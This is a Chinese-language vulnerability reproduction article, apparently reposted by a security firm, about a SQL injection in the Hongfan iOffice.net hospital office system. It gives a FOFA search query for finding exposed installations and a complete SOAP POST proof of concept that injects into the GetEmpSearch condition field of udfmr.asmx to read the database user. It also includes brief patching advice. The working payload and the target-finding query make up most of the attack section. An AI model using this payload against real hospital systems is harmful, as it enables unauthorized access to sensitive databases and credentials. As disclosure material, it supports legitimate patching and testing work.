红帆OA SQL注入漏洞复现
01 产品简介
红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。
02 漏洞概述
红帆iOffice.net udfmr.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
03 复现环境
FOFA:app="红帆-ioffice"
04 漏洞复现
http://your-ip/iOffice/prg/set/wss/udfmr.asmx?op=GetEmpSearch
出现以上这种情况则可能存在漏洞
PoC
POST /iOffice/prg/set/wss/udfmr.asmx HTTP/1.1
Host: your-ip
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/ioffice/udfmr/GetEmpSearch"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">
<condition>1=user_name()</condition>
</GetEmpSearch>
</soap:Body>
</soap:Envelope>
查询当前数据库用户
05 修复建议
限制访问来源地址,如非必要,不要将系统开放在互联网上。
升级至安全版本或打补丁。
文章来源:OidBoy_G
如果我们的文章对你有帮助,就把我们“设为星标”吧!
↓↓↓
3秒加星标,这样就不容易错过文章推送啦!
往期回顾
请长按下方图片
识别二维码 关注河北镌远
为客户创造价值
与客户共同成长
